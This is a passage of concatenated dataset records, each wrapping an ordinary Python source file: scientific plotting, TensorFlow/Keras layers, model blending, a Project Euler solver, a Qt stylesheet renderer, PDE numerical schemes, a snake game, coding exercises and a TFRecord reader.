skimage.exposure.rescale_intensity(arrow.astype(float), out_range=(0,1.0))\n # rarrow = -1 * (rarrow - 1.0)\n # print(arrow.shape)\n arrpil = Image.fromarray(arrow) # , mode='L').convert('1')\n arrpil_r = arrpil.transpose(PIL.Image.FLIP_LEFT_RIGHT)\n\n proc_yfp = [process_fp(im, ROI, min_yfp, max_yfp) for im in yfp_images]\n proc_rfp = [process_fp(im, ROI, min_rfp, max_rfp) for im in rfp_images]\n proc_phase = [process_phase(im, ROI, min_phase, max_phase) for im in phs_images]\n # joined_phs = np.hstack(list([process_phase(im, i, min_phase, max_phase) for i, im in zip(image_range, phs_images)]))\n\n # YFP and phase\n color_indv = [\n np.dstack([p, add_no_over(p, y), p]) for y, p in zip(proc_yfp, proc_phase)\n ]\n # YFP RFP and phase\n # color_indv = [np.dstack([add_no_over(p, r), add_no_over(p, y), p]) for r, y, p in zip(proc_rfp, proc_yfp, proc_phase)]\n color_anotate = [add_annotations(im, i) for i, im in zip(image_range, color_indv)]\n # print(len(color_anotate))\n rows = 2\n imgs_in_row = len(color_anotate) // rows\n list_of_points = [((r * imgs_in_row), ((r + 1) * imgs_in_row)) for r in range(rows)]\n print(list_of_points)\n\n image_rows = [\n np.hstack(color_anotate[(r * imgs_in_row) : ((r + 1) * imgs_in_row)])\n for r in range(rows)\n ]\n final = np.vstack(image_rows)\n skimage.io.imsave(os.path.join(this_dir, outimage + \"_strip.png\"), final)\n skimage.io.imsave(os.path.join(this_dir, outimage + \"_strip.jpg\"), final)\n","repo_name":"npmurphy/biofilm_pulse","sub_path":"figures/figure_padmovies/make_movie_strip.py","file_name":"make_movie_strip.py","file_ext":"py","file_size_in_byte":6716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31255337956","text":"import tensorflow as tf\nfrom tensorflow.python.keras import backend as K\nfrom tensorflow.python.keras.layers import Layer\nfrom tensorflow.python.keras.layers.pooling import GlobalPooling2D\nfrom tensorflow.python.keras.optimizers import Adam\n\n\nclass ConditionalAdamOptimizer(Adam):\n def __init__(self, lr_decay_schedule=None, **kwargs):\n super(ConditionalAdamOptimizer, self).__init__(**kwargs)\n self.lr_decay_schedule = lr_decay_schedule\n\n if lr_decay_schedule.startswith('dropatc'):\n drop_at = int(lr_decay_schedule.replace('dropatc', ''))\n drop_at_generator = drop_at * 1000\n self.lr_decay_schedule_generator = lambda iter: tf.where(K.less(iter, drop_at_generator), 1., 0.1)\n else:\n self.lr_decay_schedule_generator = lambda iter: 1.\n\n def get_updates(self, loss, params):\n conditional_params = [param for param in params if '_repart_c' in param.name]\n unconditional_params = [param for param in params if '_repart_c' not in param.name]\n\n # print (conditional_params)\n # print (unconditional_params)\n\n print(len(params))\n print(len(conditional_params))\n print(len(unconditional_params))\n\n lr = self.lr\n self.lr = self.lr_decay_schedule_generator(self.iterations) * lr\n updates = super(ConditionalAdamOptimizer, self).get_updates(loss, conditional_params)[1:]\n self.lr = lr\n updates += super(ConditionalAdamOptimizer, self).get_updates(loss, unconditional_params)\n #updates.append(K.update_sub(self.iterations, 1))\n return updates\n\n\nclass Split(Layer):\n def __init__(self, num_or_size_splits, axis, **kwargs):\n super(Split, self).__init__(**kwargs)\n self.num_or_size_splits = num_or_size_splits\n self.axis = axis\n\n def call(self, inputs):\n splits = tf.split(inputs, self.num_or_size_splits, self.axis)\n return splits\n\n\nclass GlobalSumPooling2D(GlobalPooling2D):\n \"\"\"Global sum pooling operation for spatial data.\n # Arguments\n data_format: A string,\n one of `channels_last` (default) or `channels_first`.\n The ordering of the dimensions in the inputs.\n `channels_last` corresponds to inputs with shape\n `(batch, height, width, channels)` while `channels_first`\n corresponds to inputs with shape\n `(batch, channels, height, width)`.\n It defaults to the `image_data_format` value found in your\n Keras config file at `~/.keras/keras.json`.\n If you never set it, then it will be \"channels_last\".\n # Input shape\n - If `data_format='channels_last'`:\n 4D tensor with shape:\n `(batch_size, rows, cols, channels)`\n - If `data_format='channels_first'`:\n 4D tensor with shape:\n `(batch_size, channels, rows, cols)`\n # Output shape\n 2D tensor with shape:\n `(batch_size, channels)`\n \"\"\"\n\n def call(self, inputs):\n if self.data_format == 'channels_last':\n return K.sum(inputs, axis=[1, 2])\n else:\n return K.sum(inputs, axis=[2, 3])\n\n\nclass GaussianFromPointsLayer(Layer):\n def __init__(self, sigma=6, image_size=(128, 64), **kwargs):\n self.sigma = sigma\n self.image_size = image_size\n super(GaussianFromPointsLayer, self).__init__(**kwargs)\n\n def build(self, input_shape):\n self.xx, self.yy = tf.meshgrid(tf.range(self.image_size[1]),\n tf.range(self.image_size[0]))\n self.xx = tf.expand_dims(tf.cast(self.xx, 'float32'), 2)\n self.yy = tf.expand_dims(tf.cast(self.yy, 'float32'), 2)\n\n def call(self, x, mask=None):\n def batch_map(cords):\n y = ((cords[..., 0] + 1.0) / 2.0) * self.image_size[0]\n x = ((cords[..., 1] + 1.0) / 2.0) * self.image_size[1]\n y = tf.reshape(y, (1, 1, -1))\n x = tf.reshape(x, (1, 1, -1))\n return tf.exp(-((self.yy - y) ** 2 + (self.xx - x) ** 2) / (2 * self.sigma ** 2))\n\n x = tf.map_fn(batch_map, x, dtype='float32')\n print (x.shape)\n return x\n\n def compute_output_shape(self, input_shape):\n print (input_shape)\n return tuple([input_shape[0], self.image_size[0], self.image_size[1], input_shape[1]])\n\n def get_config(self):\n config = {\"sigma\": self.sigma, \"image_size\": self.image_size}\n base_config = super(GaussianFromPointsLayer, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n","repo_name":"huangleiBuaa/StochasticityBW","sub_path":"SBW_GAN_TF/gan/layers/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":4591,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"37352419145","text":"# -*- coding:utf-8 -*-\nimport pandas as pd\nimport glob\nimport numpy as np\nfrom sklearn import metrics\n\nif __name__ == '__main__':\n files = glob.glob(\"/data2/code/DaguanFengxian/ensemble_learn/model_pred/*.csv\")\n df = None\n for f in files:\n if df is None:\n df = pd.read_csv(f)\n else:\n temp_df = pd.read_csv(f)\n df = df.merge(temp_df, on='id', how='left')\n\n print(df.head(10))\n target = df.sentiment.values\n pred_cols = ['lr_pred', 'lr_cnt_pred', 'rf_svd_pred']\n\n for col in pred_cols:\n auc = metrics.roc_auc_score(target, df[col].values)\n print(f\"{col}, overall_auc={auc}\")\n\n print(\"average\")\n avg_pred = np.mean(df[[\"lr_pred\", \"lr_cnt_pred\", \"rf_svd_pred\"]].values, axis=1)\n print(metrics.roc_auc_score(target, avg_pred))\n\n print(\"weight average\")\n lr_pred = df.lr_pred.values\n lr_cnt_pred = df.lr_cnt_pred.values\n rf_svd_pred = df.rf_svd_pred.values\n avg_pred = (3 * lr_pred + lr_cnt_pred + rf_svd_pred) / 5\n print(metrics.roc_auc_score(target, avg_pred))\n\n print(\" rank average\")\n lr_pred = df.lr_pred.rank().values\n lr_cnt_pred = df.lr_cnt_pred.rank().values\n rf_svd_pred = df.rf_svd_pred.rank().values\n avg_pred = (lr_pred + lr_cnt_pred + rf_svd_pred) / 3\n print(metrics.roc_auc_score(target, avg_pred))\n\n print(\"weight rank average\")\n lr_pred = df.lr_pred.rank().values\n lr_cnt_pred = df.lr_cnt_pred.rank().values\n rf_svd_pred = df.rf_svd_pred.rank().values\n avg_pred = (3 * lr_pred + lr_cnt_pred + rf_svd_pred) / 5\n print(metrics.roc_auc_score(target, avg_pred))\n","repo_name":"Coding-Zuo/DaguanFengxian","sub_path":"ensemble_learn/blending.py","file_name":"blending.py","file_ext":"py","file_size_in_byte":1614,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"} +{"seq_id":"24483841130","text":"\r\n##square will be defined by [[a,b],[c,d]]\r\n##a will spawn the larger square\r\n##b will spawn the smaller square\r\n##c was attached to the previous big square\r\n##d was attached the the brother square\r\n##a,b,c,d are all pairs (x,y)\r\n\r\nimport math\r\n\r\ndef pairAdd(x,y):\r\n return (x[0]+y[0],x[1]+y[1])\r\n\r\ndef pairSub(x,y):\r\n return (x[0]-y[0],x[1]-y[1])\r\n\r\ndef matMult(mat,x):\r\n return (mat[0][0]*x[0]+mat[0][1]*x[1],mat[1][0]*x[0]+mat[1][1]*x[1])\r\n\r\ndef checkUp(square):\r\n spawners = square[0]\r\n return max([p[1] for p in spawners])\r\n\r\ndef checkDown(square):\r\n spawners = square[0]\r\n return min([p[1] for p in spawners])\r\n\r\ndef checkRight(square):\r\n spawners = square[0]\r\n return max([p[0] for p in spawners])\r\n\r\ndef checkLeft(square):\r\n spawners = square[0]\r\n return min([p[0] for p in spawners])\r\n\r\ndef spawn(square):\r\n s = square[0]\r\n dx = s[1][0]-s[0][0]\r\n dy =s[1][1]-s[0][1]\r\n L=math.sqrt(dx**2+dy**2)\r\n mat = [[dx/L,-dy/L],[dy/L,dx/L]]\r\n newPoint = pairAdd(s[0], matMult(mat,(16/25*L,12/25*L)) )\r\n dx1 =newPoint[0] -s[0][0]\r\n dy1 =newPoint[1] -s[0][1]\r\n newSB = [[pairAdd(s[0],(-dy1,dx1)),pairAdd(newPoint,(-dy1,dx1))],[s[0],newPoint]]\r\n\r\n dx2 =s[1][0]-newPoint[0] \r\n dy2 =newPoint[1] -s[1][1]\r\n \r\n newSS = [[pairAdd(newPoint,(dy2,dx2)),pairAdd(s[1],(dy2,dx2))],[newPoint,s[1]]]\r\n return [newSB,newSS]\r\n \r\n\r\ncurrent = 1\r\n\r\nchange=1\r\n\r\nsquares = [[[(0,1),(1,1)],[(0,0),(1,0)]]]\r\ncounter = 0\r\n\r\nfor i in range(10):\r\n newSquares = []\r\n for s in squares:\r\n s2 = spawn(s)\r\n newSquares.append(s2[0])\r\n newSquares.append(s2[1])\r\n squares = newSquares\r\n\r\n\r\nwhile change > 10**(-11):\r\n upMost = []\r\n upness= 0\r\n downMost = []\r\n downness= 100\r\n leftMost = []\r\n leftness = 0\r\n rightMost = []\r\n rightness = 0\r\n \r\n for s in squares:\r\n s2 = spawn(s)\r\n up1 = checkUp(s2[0])\r\n up2 = checkUp(s2[1])\r\n down1 = checkDown(s2[0])\r\n down2 = checkDown(s2[1])\r\n right1 = checkRight(s2[0])\r\n right2 = checkRight(s2[1])\r\n left1 = checkLeft(s2[0])\r\n left2 = checkLeft(s2[1])\r\n if up1 > upness:\r\n upMost = s2[0]\r\n upness=up1\r\n if up2 > upness:\r\n upMost = s2[1]\r\n upness=up2\r\n if down1 < downness:\r\n downMost = s2[0]\r\n downness=down1\r\n if down2 < downness:\r\n downMost = s2[1]\r\n downness=down2\r\n if right1 > rightness:\r\n rightMost = s2[0]\r\n rightness=right1\r\n if right2 > rightness:\r\n rightMost = s2[1]\r\n rightness=right2\r\n if left1 < leftness:\r\n leftMost = s2[0]\r\n leftness=left1\r\n if left2 < leftness:\r\n leftMost = s2[1]\r\n leftness=left2\r\n squares = [upMost,downMost,leftMost,rightMost]\r\n\r\n area = (upness-min(0,downness))*(rightness-leftness)\r\n change = abs(area - current)\r\n current = area\r\n\r\n\r\nprint(current)\r\n \r\n \r\n \r\n \r\n \r\n \r\n","repo_name":"alexandrepoulin/ProjectEulerInPython","sub_path":"problems/problem 395.py","file_name":"problem 395.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12568262855","text":"import QtType\r\n\r\n\r\nclass Render:\r\n def __init__(self, stylesheet: str):\r\n self.env = {}\r\n try:\r\n with open(stylesheet, \"r+\", encoding=\"utf8\") as f:\r\n s = f.read()\r\n try:\r\n l_env = {}\r\n exec(s, l_env)\r\n if isinstance(l_env.get(\"__ALL__\", None), dict):\r\n self.env.update(l_env[\"__ALL__\"])\r\n except Exception as e:\r\n print(\"exec \", stylesheet, \"failed, E: \", e)\r\n except FileNotFoundError:\r\n pass\r\n # print(\"use render script\", self.env)\r\n\r\n def do_render(self, src: str, dst: str):\r\n print(\"render \", src, \" to \", dst)\r\n ori_s = None\r\n with open(src, \"r\", encoding=\"utf-8\") as f:\r\n ori_s = f.read()\r\n if ori_s is None:\r\n raise Exception(\"open {0} failed !\\n\".format(src))\r\n qt_obj = QtType.QtUiObject.loads(ori_s)\r\n\r\n for k, v in self.env.items():\r\n self.render_stylesheet_by_format(qt_obj, k, v)\r\n\r\n qt_obj.dump(dst)\r\n return True\r\n\r\n @staticmethod\r\n def render_stylesheet_by_format(obj: QtType.QtUiObject, obj_marker: str,\r\n fmt_style: str, marker_key: str = \"whatsThis\"):\r\n fmt_style = QtType.QtStyleSheet(fmt_style)\r\n\r\n for item in obj.gen_obj_by_marker(obj_marker, marker_key):\r\n inst_style = QtType.QtStyleSheet(item.styleSheet.content())\r\n for k, v in fmt_style.items():\r\n if isinstance(v, dict):\r\n if inst_style.get(k, None) is None:\r\n inst_style[k] = {}\r\n for sub_k, sub_v in v.items():\r\n inst_sub_v = inst_style[k].get(sub_k, None)\r\n if inst_sub_v is None:\r\n continue\r\n assert isinstance(sub_v, str)\r\n inst_style[k][sub_k] = sub_v\r\n elif isinstance(v, str):\r\n if inst_style.get(k, None) is None: # 不允许{}外部添加属性\r\n continue\r\n inst_style[k] = v\r\n else:\r\n raise Exception(\"not support type {0} of {1}\".format(type(v), k))\r\n\r\n item.styleSheet.set(\"string\", inst_style.to_string())\r\n\r\n","repo_name":"closesakuya/QtUiFileRender","sub_path":"render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":2387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8662121928","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math\n\n\nclass ParabolicTypeEquations:\n def __init__(self, func, phi_0, phi_l, xi, x, t, a, N=100):\n self.func = func\n self.phi_0 = phi_0\n self.phi_l = phi_l\n self.xi = xi\n self.x = x\n self.t = t\n self.N = N\n self.h = (x[-1] - x[1]) / N\n self.tau = (t[-1] - t[1]) / N\n self.sigma = a * a * self.tau / self.h / self.h\n\n # Точное решение\n def exact_solution(self):\n return np.array([[self.func(x, t) for t in self.t] for x in self.x])\n\n # Явная конечно-разностная схема\n def explicit_finite_difference_scheme(self):\n u = [[0 for j in range(len(self.t))] for i in range(len(self.x))]\n\n for j in range(len(self.x)):\n u[j][0] = self.xi(self.x[j])\n\n for k in range(len(self.t) - 1):\n u[0][k + 1] = self.phi_0(self.t[k + 1])\n\n for k in range(len(self.t) - 1):\n u[-1][k + 1] = self.phi_l(self.t[k + 1])\n\n for j in range(1, len(self.x) - 1):\n for k in range(len(self.t) - 1):\n u[j][k + 1] = self.sigma * u[j + 1][k] + (1 - 2 * self.sigma) * u[j][k] + self.sigma * u[j - 1][k]\n\n return u\n\n # Неявная схема\n def implicit_finite_difference_scheme(self):\n u = [[0 for j in range(len(self.t))] for i in range(len(self.x))]\n\n for k in range(len(self.t) - 1):\n u[0][k + 1] = self.phi_0(self.t[k + 1])\n\n for k in range(len(self.t) - 1):\n u[-1][k + 1] = self.phi_l(self.t[k + 1])\n\n for j in range(len(self.x)):\n u[j][0] = self.xi(self.x[j])\n\n for k in range(len(self.t) - 1):\n A = [self.sigma if i != 0 else 0 for i in range(self.N - 2)]\n B = [-(1 + 2 * self.sigma) for i in range(self.N - 2)]\n C = [self.sigma if i != self.N - 3 else 0 for i in range(self.N - 2)]\n D = [-u[j][k] for j in range(2, self.N - 2)]\n D.insert(0, -(u[1][k] + self.sigma * self.phi_0(self.t[k + 1])))\n D.append(-(u[self.N - 1][k] + self.sigma * self.phi_l(self.t[k + 1])))\n\n uk = self.progonka(A, B, C, D)\n for j in range(1, self.N - 1):\n u[j][k + 1] = uk[j - 1]\n\n return u\n\n # Явно-неявня схема\n def explicit_implicit_finite_difference_scheme(self, teta):\n u = [[0 for j in range(len(self.t))] for i in range(len(self.x))]\n\n for k in range(len(self.t) - 1):\n u[0][k + 1] = self.phi_0(self.t[k + 1])\n\n for k in range(len(self.t) - 1):\n u[-1][k + 1] = self.phi_l(self.t[k + 1])\n\n for j in range(len(self.x)):\n u[j][0] = self.xi(self.x[j])\n\n for k in range(len(self.t) - 1):\n A = [teta * self.sigma if i != 0 else 0 for i in range(self.N - 2)]\n B = [-(1 + 2 * teta * self.sigma) for i in range(self.N - 2)]\n C = [teta * self.sigma if i != self.N - 3 else 0 for i in range(self.N - 2)]\n D = [- (1 - teta) * self.sigma * u[j + 1][k] - (1 - 2 * (1 - teta) * self.sigma) * u[j][k] - (\n 1 - teta) * self.sigma * u[j - 1][k] for j in range(2, self.N - 2)]\n D.insert(0, -(teta * self.sigma * self.phi_0(self.t[k + 1]) + (1 - teta) * self.sigma * u[2][k] + (\n 1 - 2 * (1 - teta) * self.sigma) * u[1][k] + (1 - teta) * self.sigma * self.phi_0(self.t[k])))\n D.append(-(teta * self.sigma * self.phi_l(self.t[k + 1]) + (1 - teta) * self.sigma * self.phi_l(self.t[k]) + (\n 1 - 2 * (1 - teta) * self.sigma) * u[self.N - 1][k] + (1 - teta) * self.sigma * u[self.N - 2][\n k]))\n\n uk = self.progonka(A, B, C, D)\n\n for j in range(1, self.N - 1):\n u[j][k + 1] = uk[j - 1]\n\n return u\n\n def progonka(self, a, b, c, d):\n n = len(a)\n for i in range(n):\n if math.fabs(b[i]) < math.fabs(a[i]) + math.fabs(c[i]):\n raise Exception\n\n # Формирование массивов P, Q (Расчет значений) ((Прямой ход))\n\n P, Q = [-c[0] / b[0]], [d[0] / b[0]]\n\n for i in range(1, n):\n P.append(-c[i] / (b[i] + a[i] * P[i - 1]))\n Q.append((d[i] - a[i] * Q[i - 1]) / (b[i] + a[i] * P[i - 1]))\n\n # Вычисление решения системы (Обратный ход)\n x = [Q[n - 1]]\n for i in range(1, n):\n x.append(P[n - 1 - i] * x[i - 1] + Q[n - 1 - i])\n\n return list(reversed(x))\n\n\ndef main():\n a = 0.01\n\n U = lambda x, t: np.exp(-a * t) * np.cos(x)\n\n phi_0 = lambda t: math.exp(-a * t)\n phi_l = lambda t: -math.exp(-a * t)\n xi = lambda x: math.cos(x)\n\n N = 100\n X = np.linspace(0, 3, N)\n T = np.linspace(0, math.pi, N)\n\n equations = ParabolicTypeEquations(U, phi_0, phi_l, xi, X, T, a)\n\n fig = plt.figure(figsize=(20, 12))\n ax = fig.add_subplot(1, 4, 1, projection='3d')\n ax.set_title('Точное решение')\n\n u = equations.exact_solution()\n\n Q, W = np.meshgrid(X, T)\n ax.plot_surface(W, Q, np.array(u))\n\n ax.set_xlabel('x Label')\n ax.set_ylabel('t Label')\n ax.set_zlabel('u Label')\n\n ax = fig.add_subplot(1, 4, 2, projection='3d')\n ax.set_title('Явная схема')\n\n u = equations.explicit_finite_difference_scheme()\n\n Q, W = np.meshgrid(X, T)\n ax.plot_surface(W, Q, np.array(u))\n\n ax.set_xlabel('x Label')\n ax.set_ylabel('t Label')\n ax.set_zlabel('u Label')\n print('Явная схема: средкв ошибка:',\n math.sqrt(sum([sum([(U(X[i], T[j]) - u[i][j]) ** 2 for j in range(len(T))]) for i in range(len(X))])))\n\n ax = fig.add_subplot(1, 4, 3, projection='3d')\n ax.set_title('Неявная схема')\n\n u = equations.implicit_finite_difference_scheme()\n\n Q, W = np.meshgrid(X, T)\n ax.plot_surface(W, Q, np.array(u))\n\n ax.set_xlabel('x Label')\n ax.set_ylabel('t Label')\n ax.set_zlabel('u Label')\n print('Неявная схема: средкв ошибка:',\n math.sqrt(sum([sum([(U(X[i], T[j]) - u[i][j]) ** 2 for j in range(len(T))]) for i in range(len(X))])))\n\n ax = fig.add_subplot(1, 4, 4, projection='3d')\n ax.set_title('Явно-неявная схема')\n\n u = equations.explicit_implicit_finite_difference_scheme(1 / 2)\n\n Q, W = np.meshgrid(X, T)\n ax.plot_surface(W, Q, np.array(u))\n\n ax.set_xlabel('x Label')\n ax.set_ylabel('t Label')\n ax.set_zlabel('u Label')\n print('Явно-неявная схема: средкв ошибка:',\n math.sqrt(sum([sum([(U(X[i], T[j]) - u[i][j]) ** 2 for j in range(len(T))]) for i in range(len(X))])))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"pivovarov-mai/80-409b-19","sub_path":"gordionok/lab5.py","file_name":"lab5.py","file_ext":"py","file_size_in_byte":6841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8940585530","text":"import pygame\nimport random\nimport neat\nimport os\nfrom resources.reference import *\nfrom resources.util import *\nfrom gamesrc.grid import Grid\nfrom gamesrc.snake import Snake\nfrom gamesrc.food import Food\n\n\ndef has_failed(snake):\n \"\"\"\n This function checks to see if the snake has met any of the fail conditions.\n Since the grid is a standard 30 by 30 grid, the grid object is not required\n to check extremes.\n\n Arguments:\n snake {Snake} -- The snake whose status is to be found.\n\n Returns:\n boolean -- true if it has met a fail condition and False otherwise.\n \"\"\"\n x, y = snake.coords[0][0], snake.coords[0][1]\n\n # Did it hit its own body?\n if ((x, y) in snake.coords[1:]):\n return True\n elif x < 0 or x > 29 or y < 0 or y > 29: # Did it go outside the grid?\n return True\n else:\n return False\n\n\ndef draw(window, snake, food, score):\n \"\"\"\n This function draws and updates the pygame window with the given information.\n\n Arguments:\n window {Surface} -- The active PyGame window\n snake {Snake} -- The snake in the game\n food {Food} -- The food in the game\n score {int} -- The current score\n \"\"\"\n\n global ANIMATION_TICK\n ANIMATION_TICK -= 1 # Used to change food color\n\n window.fill((0, 0, 51))\n\n # Food color changing and drawing is handled here\n if ANIMATION_TICK == 0:\n global FOOD_RGB\n FOOD_RGB = (\n random.randrange(\n 50, 255), random.randrange(\n 50, 255), random.randrange(\n 50, 255))\n FOOD_IMG.fill(FOOD_RGB)\n ANIMATION_TICK = 25\n else:\n window.blit(FOOD_IMG, (food.x * 15, food.y * 15))\n\n # Draw snake\n for i, coord in enumerate(snake.coords):\n x = coord[0] * 15\n y = coord[1] * 15\n\n if i == 0:\n head = pygame.Surface((15, 15))\n head.fill((255, 255, 255))\n WINDOW.blit(head, (x, y))\n else:\n WINDOW.blit(SNAKE_IMG, (x, y))\n\n # Draw Score\n score_txt = STAT_FONT.render(\"Score: \" + str(score), 1, (255, 255, 255))\n window.blit(\n score_txt,\n (WIN_WIDTH - 10 - score_txt.get_width(), 10)) # top right of screen\n\n pygame.display.update()\n\n\ndef main():\n \"\"\"This function runs the game for humans.\n \"\"\"\n\n global FOOD_RGB # Food needs RGB too\n grid = Grid()\n snake = Snake()\n food = generate_food(grid, snake)\n score = 0\n\n isRunning = True\n while isRunning:\n game_clock.tick(17)\n\n move = None\n for event in pygame.event.get():\n # Handle Quittiing\n if event.type == pygame.QUIT:\n isRunning = False\n pygame.quit()\n quit()\n\n # Check for key presses\n elif event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n move = \"L\"\n elif event.key == pygame.K_RIGHT:\n move = \"R\"\n\n # Moves ahead if you didn't choose a move\n if move is None:\n snake.tick(grid)\n else:\n snake.move(grid, move)\n\n # Check if snake collided with the food\n if snake.collide(food):\n score += 1\n snake.elongate(grid)\n\n # Fancy color changing for snake :)\n SNAKE_IMG.fill(FOOD_RGB)\n\n food = generate_food(grid, snake)\n\n # Stop running in case\n if has_failed(snake):\n isRunning = False\n break\n\n draw(WINDOW, snake, food, score)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Adi-UA/AI-Plays-Snake","sub_path":"snake_game.py","file_name":"snake_game.py","file_ext":"py","file_size_in_byte":3618,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"72851398952","text":"# Remove all elements from a linked list of integers that have value val.\n\n# Have you met this question in a real interview? Yes\n# Example\n# Given 1->2->3->3->4->5->3, val = 3, you should return the list as 1->2->4->5\n\nfrom ListNode import ListNode\n\ndef removeLinkedListElements(head, val):\n if head == None or val == None:\n return head\n dummy = ListNode(0)\n dummy.next = head\n head = dummy\n while head.next != None:\n if head.next.val == val:\n head.next = head.next.next\n else:\n head = head.next\n return dummy.next\n\nhead = ListNode.arrayToList([1, 2, 3, 3, 4, 5, 3])\nListNode.printList(removeLinkedListElements(head, 3))\n\n","repo_name":"cutewindy/CodingInterview","sub_path":"LintCode_Python/removeLinkedListElements.py","file_name":"removeLinkedListElements.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"40580319618","text":"#-*- coding:utf-8\nimport pandas as pd\nimport os\n \n##########需要转换的csv文件###########\npath_dir = './'\ncsvPath = path_dir + 'train_labels.csv'\nif not os.path.exists(csvPath):\n print('Not that files:%s'%csvPath)\n \n'''\npandas.read_csv() 报错 OSError: Initializing from file failed,\n一种是函数参数为路径而非文件名称,另一种是函数参数带有中文。\n'''\n##########转换成txt文件###########\ntxtPath = path_dir+'train_labels.txt'\ndata = pd.read_csv(csvPath, encoding='utf-8')\n \nwith open(txtPath,'a+', encoding='utf-8') as f:\n for line in data.values:\n f.write((str(line[0])+'\\t'+str(line[1])+','+str(line[2])+'\\t'+str(line[4])+','+str(line[5])+','+str(line[6])+','+str(line[7])+'\\t'+str(line[3])+'\\n'))\n","repo_name":"cassie1728/hand-detection-with-egodata","sub_path":"data_deal/csv2txt.py","file_name":"csv2txt.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13478529361","text":"weight = 41.5\n\n# Ground Shipping\nflat_rate_ground = 20.00\nif weight <= 2:\n cost_ground = flat_rate_ground + 1.5 * weight\nelif weight > 2 and weight <= 6:\n cost_ground = flat_rate_ground + 3 * weight\nelif weight > 6 and weight <= 10:\n cost_ground = flat_rate_ground + 4 * weight\nelse:\n cost_ground = flat_rate_ground + 4.75 * weight\n\nprint(\"Ground Shipping cost: ${0}\".format(cost_ground))\n\n# Ground Shipping Premium\ncost_ground_premium = 125\n\nprint(\"Ground Shipping Premium cost: ${0}\".format(cost_ground_premium))\n\n# Drone Shipping\nif weight <= 2:\n cost_drone = 4.5 * weight\nelif weight > 2 and weight <= 6:\n cost_drone = 9 * weight\nelif weight > 6 and weight <= 10:\n cost_drone = 12 * weight\nelse:\n cost_drone = 14.25 * weight\n\nprint(\"Drone Shipping cost: ${0}\".format(cost_drone))\n","repo_name":"pedrolrc/python3_codecademy_course","sub_path":"modules/02_control_flow/03-project-sals_shipping.py","file_name":"03-project-sals_shipping.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32645403346","text":"import matplotlib.pyplot as plt\nimport tensorflow as tf\nimport sys\nimport os\n\nimport numpy as np\n\nsys.path.append(\"..\")\nfrom data_augmentation import rotate\n\n\ndef read_and_decode(filename_queue,\n batch_size):\n \"\"\"\n Create a queue for the task of visualizing embedding\n Only return the caption and the true image\n :param filename_queue: All filenames\n :param batch_size: Size of the batch\n :return:\n \"\"\"\n # Create a tfRecordReader\n reader = tf.TFRecordReader()\n\n # Read a single example\n _, image_file = reader.read(filename_queue)\n\n # All fixed length features\n context_features = {\n \"img\": tf.FixedLenFeature([], tf.string)\n }\n\n # For ease of use, I used sequential features even if I knew the length\n sequence_features = {}\n for index in range(5):\n sequence_features[\"caption{}\".format(index)] = tf.VarLenFeature(dtype=tf.float32)\n\n # Parse the example\n context_parsed, sequence_parsed = tf.parse_single_sequence_example(\n serialized=image_file,\n context_features=context_features,\n sequence_features=sequence_features\n )\n\n # Decode the raw float image\n image = tf.decode_raw(context_parsed[\"img\"], tf.uint8)\n # Reshape the image. Here the number of channel varies between sample\n # Some images are 1D channel, some other are 3D\n image = tf.reshape(image, (64, 64, -1))\n image_unit32 = 2 * tf.image.convert_image_dtype(image, dtype=tf.float32) - 1\n\n # image_unit32 = tf.image.rgb_to_hsv(image)\n # If number of channel is 1 -> modify to rgb scale\n image_unit32 = tf.cond(pred=tf.equal(tf.shape(image_unit32)[2], 3),\n fn1=lambda: image_unit32,\n fn2=lambda: tf.image.grayscale_to_rgb(image_unit32))\n\n # Need to define the true shape\n image_unit32.set_shape((64, 64, 3))\n # image_unit32 = rotate(image_unit32, 30)\n\n min_queue_examples = 256 # Shuffle elements\n\n # Because I know the true shape, I don't need sparse tensor (introduced by the use of sequence_features)\n # so i transform them to dense vector + reshape them\n caption0 = tf.reshape(tf.sparse_tensor_to_dense(sequence_parsed[\"caption0\"]), (4800, 1))\n caption1 = tf.reshape(tf.sparse_tensor_to_dense(sequence_parsed[\"caption1\"]), (4800, 1))\n caption2 = tf.reshape(tf.sparse_tensor_to_dense(sequence_parsed[\"caption2\"]), (4800, 1))\n caption3 = tf.reshape(tf.sparse_tensor_to_dense(sequence_parsed[\"caption3\"]), (4800, 1))\n caption4 = tf.reshape(tf.sparse_tensor_to_dense(sequence_parsed[\"caption4\"]), (4800, 1))\n\n inputs = [image_unit32,\n caption0,\n caption1,\n caption2,\n caption3,\n caption4,\n ]\n images = tf.train.batch(\n inputs,\n batch_size=batch_size,\n capacity=min_queue_examples + 3 * batch_size)\n return images\n\n\nif __name__ == '__main__':\n\n batch_size = 4\n writer_filename = [os.path.join(\"..\", \"examples\", \"train{}.tfrecords\".format(i)) for i in range(3, 4)]\n filename_queue = tf.train.string_input_producer(\n writer_filename)\n images = read_and_decode(filename_queue, batch_size)\n with tf.Session() as sess:\n group = tf.group(tf.global_variables_initializer(), tf.local_variables_initializer())\n\n sess.run(group)\n coord = tf.train.Coordinator()\n tf.train.start_queue_runners(sess=sess)\n for i in range(1000):\n out = sess.run(images)\n\n for b in 